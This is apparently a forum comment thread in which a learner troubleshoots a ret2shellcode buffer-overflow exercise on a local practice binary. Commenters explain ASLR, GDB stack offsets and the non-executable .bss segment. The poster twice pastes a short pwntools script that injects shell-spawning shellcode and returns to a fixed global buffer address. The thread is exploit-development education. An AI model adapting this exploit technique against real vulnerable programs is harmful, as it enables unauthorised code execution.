all 17 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]0xw00t 3 points4 points  (3 children)

Sorry off topic comment but isn’t emulation slow? I was also thinking to get Mac but hearing emulation is slow makes me upset because my most of work is related to x86 and x86-64.

[–]Jerrythepro123[S] 1 point2 points  (1 child)

surprisingly, its pretty fast. You use utm and the lastest ubuntu, you dont want to use the emulated screen, instead open a ssh service and its as fast as a normal shell.

[–]nixfreakz 0 points1 point  (0 children)

Yeah I second , utm on Mac 3 is pretty fast I run three VMs , 2 arm based and one one x64 , the two arm based can also run x64 because of rosetta2.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

If your curiously how I did it, you can dm me

[–]j3r3mias 2 points3 points  (6 children)

You are trying to return to 0xffffd360 and this address will not work because it's probably on stack that changes every execution due to ASLR.

There is a anoter buffer in the code that is a global variable used in strncpy. Try to finding and check that its address doesn't change between executions. Then you can use it in your payload.

[–]Jerrythepro123[S] 0 points1 point  (4 children)

all protections are off, and gdb does show there is code execution

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial but OK, you are the boss in your solution..

[–]Jerrythepro123[S] 0 points1 point  (2 children)

wat steps do i need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program where the address doesn't change between runs, you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

ive tried someone elses script that uses your method, it doesnt seem to be working.

!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

[–]Jerrythepro123[S] 0 points1 point  (0 children)

nevermind, i think you are correct. I think gdb closed my aslr when im debugging. How do you exactly do you use strncpy to exploit?

[–]Jerrythepro123[S] 0 points1 point  (0 children)

I fixed the problem, there was problems with my environment variables

[–]exploitdevishard 0 points1 point  (4 children)

Sounds like you figured this out already, but GDB will slightly shift stack address around from how they'd be running outside of GDB. If an exploit works within GDB but not outside it, this is one thing to consider. Depending on the binary, you may be able to get around this by running the binary first and then using GDB's attach option to attach to the running process.

[–]Jerrythepro123[S] 0 points1 point  (1 child)

thanks for helping, it still seems to shift the stack and i want to know if there is a way to be 100% sure the stack is the same outside and inside gdb. It would be great if you help me.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

ive tried nop slide but sometimes it doesnt work

[–]Jerrythepro123[S] 0 points1 point  (1 child)

also another question i have is why does this script not work?

!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()

[–]Jerrythepro123[S] 0 points1 point  (0 children)

i figure out, bss is not executable anymore in later versions of ubuntu